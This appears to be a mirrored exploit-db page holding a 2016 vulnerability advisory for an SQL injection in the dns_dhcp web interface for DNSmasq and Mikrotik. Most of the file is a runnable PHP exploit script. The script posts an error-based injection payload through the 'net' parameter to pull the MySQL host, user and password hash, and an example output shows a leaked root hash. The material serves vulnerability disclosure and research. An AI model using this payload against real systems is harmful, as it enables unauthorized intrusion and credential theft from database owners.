bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39817.php
Offensive Security 8fea20e59f DB: 2016-05-17 
12 new exploits

Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit
Microsoft Windows WebDAV - Remote PoC Exploit
Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit
Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit

Microsoft Windows WebDav II - Remote Root Exploit (2)
Microsoft Windows WebDAV - Remote Root Exploit (2)

Microsoft Windows WebDav III - Remote Root Exploit (xwdav)
Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)

Dream FTP 1.2 - Remote Format String Exploit
BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit

Apache Tomcat (webdav) - Remote File Disclosure Exploit
Apache Tomcat (WebDAV) - Remote File Disclosure Exploit

Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)
Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)
Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC
Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC

Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow
Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow

Liferay 6.0.x Webdav File Reading Vulnerability
Liferay 6.0.x WebDAV - File Reading Vulnerability

Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities
Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)
Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)
Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)

BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)

Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability

Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)

Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness

Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness

MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit

Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
Apache Struts 2.0.0 <= 2.2.1.1 -  XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability

EasyCafe Server <= 2.2.14 Remote File Read
EasyCafe Server <= 2.2.14 - Remote File Read
x86_64 Linux bind TCP port shellcode
TCP Bindshell with Password Prompt - 162 bytes
x86_64 Linux bind TCP port shellcode
TCP Bindshell with Password Prompt - 162 bytes

Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)
CakePHP Framework 3.2.4 - IP Spoofing
Multiples Nexon Games - Unquoted Path Privilege Escalation
eXtplorer 2.1.9 - Archive Path Traversal
Web interface for DNSmasq / Mikrotik - SQL Injection
Microsoft Excel 2010 - Crash PoC
Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation
Web2py 2.14.5 - Multiple Vulnerabilities
2016-05-17 05:03:19 +00:00

150 lines
No EOL
4.2 KiB
PHP
Executable file
Raw Blame History

/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt
[+] ISR: apparitionsec
Vendor:
====================
tmcdos / sourceforge
Product:
======================
dns_dhcp Web Interface
Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory
This is a very simple web interface for management of static DHCP leases in
DNSmasq and Mikrotik.
It generates config files for DNSmasq and uses RouterOS API to manage
Mikrotik. Network devices (usually PCs)
are separated into subnets by department and use triplets (hostname, MAC
address, IP address) for identification.
Information is stored in MySQL.
Vulnerability Type:
===================
SQL Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
The 'net' HTTP form POST parameter to dns.php script is not
checked/santized and is used directly in MySQL query allowing
attacker to easily exfiltrate any data from the backend database by using
SQL Injection exploits.
1) On line 239 of dns.php
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);
2)
dns.php line 187 the a_select function where 2nd argument $_REQUEST['net']
is passed to an concatenated to query ($clause)
and executed on line 194 mysql_query($query).
function a_select($tbl,$clause,$field='',$where='')
{
if ($clause==0) return '&#160;';
if($field=='') $field=$tbl;
$query = "SELECT $field FROM $tbl WHERE ";
if($where=='') $query.='ID='.$clause;
else $query.=$where;
$res = mysql_query($query) or
trigger_error($query.'<br>'.mysql_error(),E_USER_ERROR);
if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
else return '&#160;';
}
Exploit code(s):
===============
Run from CL...
*/
<?php
#dns_dhcp SQL Injection Exploit
#exfiltrates host, user and password from MySQL
#by hyp3rlinx
#ISR - apparitionsec
#hyp3rlinx.altervista.org
#========================
$victim="localhost";
$url="/dns_dhcp/dns/dns.php";
$port=80;
$r='';
$s = fsockopen($victim, $port, $errno, $errstr, 30);
if(!$s){echo "Cant connect to the fucking server!"; exit();}
$sql="net=1 and (select 1 from(select count(*),concat((select (select
concat(0x2b,host,0x2b,user,0x2b,password,0x2b)) from mysql.user limit
1),floor(rand(0)*2))x from mysql.user group by x)a)";
$out = "POST $url HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $sql);
while (!feof($s)) {
$r .= fgets($s, 128);
if(strpos($r,'Duplicate entry')!==FALSE){
$idx=strpos($r,'Duplicate entry');
echo substr($r,$idx);
break;
}
}
fclose($s);
/*
Example result:
Duplicate entry
'+localhost+root+*6691484EA6B50DDDE1926A220DA01FA9E575C18A+1' for key
'group_key'
*/
?>
/*
Disclosure Timeline:
===============================
Vendor Notification: NA
May 14, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==================================================
Request Method(s): [+] POST
Vulnerable Product: [+] dns_dhcp Web Interface
Vulnerable Parameter(s): [+] 'net'
=====================================================
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/
Reference in a new issue View git blame Copy permalink